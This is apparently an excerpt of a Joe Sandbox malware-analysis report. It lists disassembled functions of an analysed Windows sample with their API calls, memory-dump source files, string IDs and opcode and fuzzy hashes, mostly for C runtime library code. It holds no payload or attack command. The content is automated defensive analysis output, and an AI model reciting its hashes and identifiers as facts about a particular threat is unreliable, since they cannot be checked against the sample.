                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                      • Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                                                                                                                                      • Instruction ID: ad46a4e6391cb5e9bd54a2683fb09feb9601a610905be2272d0da6a99ddb23c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0F6329407109BDFA9BF785C0774E32A26F14363F10410DFC01A72D2CB255A08CA5D
                                                                                                                                                                                                                      Function 00619EE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00619F1F
                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00619FD3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                      • String ID: #Da$csm
                                                                                                                                                                                                                      • API String ID: 3480331319-1849695722
                                                                                                                                                                                                                      • Opcode ID: aa9a8c981f725adaba7f72cf571791093933bb8a1f0684dcf23096d10c1f146a
                                                                                                                                                                                                                      • Instruction ID: fdf6bfcd2cf9a6799b9371bfa809c0c7010e3c71de8ad8e2014bcf3d06238e10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa9a8c981f725adaba7f72cf571791093933bb8a1f0684dcf23096d10c1f146a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC41A634A00219AFCF10DF68C895ADEBBB7AF45314F188059F8159B3A2D731D996CFA1
                                                                                                                                                                                                                      Function 0061B222 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0061B1D3,00000000,?,00699C4C,?,?,?,0061B376,00000004,InitializeCriticalSectionEx,0062FC70,InitializeCriticalSectionEx), ref: 0061B22F
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0061B1D3,00000000,?,00699C4C,?,?,?,0061B376,00000004,InitializeCriticalSectionEx,0062FC70,InitializeCriticalSectionEx,00000000,?,0061B12D), ref: 0061B239
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0061B261
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                      • Opcode ID: f4505dfc4a4b8e66b5c80e83496fa049018c6180a197fe9ae274a770565206c9
                                                                                                                                                                                                                      • Instruction ID: a9ee49c8b4964771b4fc85236dab90408ef7564be3a8fc5b3fd6e71daeaf08d3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4505dfc4a4b8e66b5c80e83496fa049018c6180a197fe9ae274a770565206c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1E0123078460CBAEF201B60EC06BE93A57AB05B40F145430FD0CA81A1DBB299668995
                                                                                                                                                                                                                      Function 006227D2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(4E0C77D7,00000000,00000000,00000000), ref: 00622835
                                                                                                                                                                                                                        • Part of subcall function 00626DC6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00625E8B,?,00000000,-00000008), ref: 00626E72
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00622A90
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00622AD8
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00622B7B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                                                                                      • Opcode ID: 776fd10cc737a9492aaa0378287c389930847f94bc223a16c39187eb68e4760d
                                                                                                                                                                                                                      • Instruction ID: 8872e33fe63ac319c486742eb3073f1892e9c426be5b98f9f1eac57eaf582fe5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 776fd10cc737a9492aaa0378287c389930847f94bc223a16c39187eb68e4760d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3D15975D0066AAFCB15CFA8E8909EDBBB6FF09314F18412AE855EB351D630A942CF50
                                                                                                                                                                                                                      Function 0064605E Relevance: 6.3, APIs: 4, Instructions: 325COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                      • Opcode ID: bac98b0d92627ac6fcbfd1674c851cb45d1b92f73563de9ef655c797b2eab497
                                                                                                                                                                                                                      • Instruction ID: 84a12339dd4aa0c41689265f130613ddc1d194b06958574757c497a9f3d9fdf2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bac98b0d92627ac6fcbfd1674c851cb45d1b92f73563de9ef655c797b2eab497
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90D1C5B191012EAEDB60EB94DC82AEDB7B9AF04704F1014EBE508B3151DA747F89CF65
                                                                                                                                                                                                                      Function 00650149 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                      • Opcode ID: bfaf77ebd1216219997c5792d14ad426763512d1a8b8f27a9b87d2163361209e
                                                                                                                                                                                                                      • Instruction ID: 305eb1bff119dc1283710fcdaef7db6cc73297c9503eab787b54c6977ee3feeb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf77ebd1216219997c5792d14ad426763512d1a8b8f27a9b87d2163361209e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A95188B1E4022A9BCB65EF64CC82A9DB3BDEB44705F4110E9E718B3151DB346F868F58
                                                                                                                                                                                                                      Function 0064E395 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                      • Opcode ID: 2a51c862d1c13de875fab134e18e2f80e2f19343a1c8e3f8ae0c5a767e789105
                                                                                                                                                                                                                      • Instruction ID: e652a779e23c4371c4f58d102ea93404f7d7a8a25ddb0d93e02807c34c324c98
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a51c862d1c13de875fab134e18e2f80e2f19343a1c8e3f8ae0c5a767e789105
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C341B471D4021DBADB14FBA0DC47FDE737DAF09700F144499B605A7180EAB5AB888FA9
                                                                                                                                                                                                                      Function 0065E88D Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065E899
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __getptd_noexit.LIBCMT ref: 0065C82F
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __amsg_exit.LIBCMT ref: 0065C83C
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0065E8B9
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065E8C9
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0065E8F9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3170801528-0
                                                                                                                                                                                                                      • Opcode ID: c06df6ae161455b28f18b3074e27148dc1f3d2fbb5812fc2da9f1c9990f9b89a
                                                                                                                                                                                                                      • Instruction ID: e3ba7644d6651ecbfb5d62037498dfb7fca586bf302be2b80b7d4727027e29a8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c06df6ae161455b28f18b3074e27148dc1f3d2fbb5812fc2da9f1c9990f9b89a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8101D632D01B21DBDF65AF64980979D7761BF04712F040129EC10673D1CB356A49CBC9
                                                                                                                                                                                                                      Function 0062BCBB Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000), ref: 0062BCD2
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000,00000000,00000000,?,00623156,00000000), ref: 0062BCDE
                                                                                                                                                                                                                        • Part of subcall function 0062BCA4: CloseHandle.KERNEL32(FFFFFFFE,0062BCEE,?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000,00000000,00000000), ref: 0062BCB4
                                                                                                                                                                                                                      • ___initconout.LIBCMT ref: 0062BCEE
                                                                                                                                                                                                                        • Part of subcall function 0062BC66: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0062BC95,0062ACD8,00000000,?,00622BCF,00000000,00000000,00000000,00000000), ref: 0062BC79
                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000,00000000), ref: 0062BD03
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                                                      • Opcode ID: 1f02d3b17e6c41c92be894873bd10bdb7c5473940b9591c3cc99823ffe9c7134
                                                                                                                                                                                                                      • Instruction ID: 419fc1230ae0d5cedb5e364674d778d855126448f1acdb827ebe5d5ecb38832b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f02d3b17e6c41c92be894873bd10bdb7c5473940b9591c3cc99823ffe9c7134
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF01C36500529FBCF222FA1EC449D93F27EF487A0B059421FE1986130DB328821AFD1
                                                                                                                                                                                                                      Function 00615BF2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Fputc
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 3078413507-1810561636
                                                                                                                                                                                                                      • Opcode ID: 3f931f2dce18714f79b7bc14bdce9a897016da171d803cde1353596cbb4a267b
                                                                                                                                                                                                                      • Instruction ID: b941999b39a94838446ddbd22b4a83c31693fdc8c3aa62ef57a5dace78aaba18
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f931f2dce18714f79b7bc14bdce9a897016da171d803cde1353596cbb4a267b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68415B32900B1AEBCB14DF64C5809EDB7BABF48350B58002AE442A7754EB31EA80CBD0
                                                                                                                                                                                                                      Function 0061A7ED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 0061A812
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                      • Opcode ID: 86cf36d671cc439f94cddc2468dac57911393b30183ec373693116d769d88801
                                                                                                                                                                                                                      • Instruction ID: c3d98b09418576ea1ee514e33c0e5b06381fd53c71c93ec1d1dd787cc16263e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86cf36d671cc439f94cddc2468dac57911393b30183ec373693116d769d88801
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF419831901209EFCF16DF98CD81AEEBBB6BF08300F198499F914A7221D3359A91DB52
                                                                                                                                                                                                                      Function 006151B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006151C3
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0061521F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 593203224-1810561636
                                                                                                                                                                                                                      • Opcode ID: 93da960814a28819d5a87aba8c188e29cfe22431f512f68aec894bd9a7259745
                                                                                                                                                                                                                      • Instruction ID: 7546f155640187d39f1eeed4db39771ac56b5a72503790fce66213102432531e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93da960814a28819d5a87aba8c188e29cfe22431f512f68aec894bd9a7259745
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8019E31600918EFCB11DB58C899EDDB7BAEF84710B1840A9E802AB361DB71EE81CB50
                                                                                                                                                                                                                      Function 006115D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006115DC
                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00611614
                                                                                                                                                                                                                        • Part of subcall function 00615228: _Yarn.LIBCPMT ref: 00615247
                                                                                                                                                                                                                        • Part of subcall function 00615228: _Yarn.LIBCPMT ref: 0061526B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
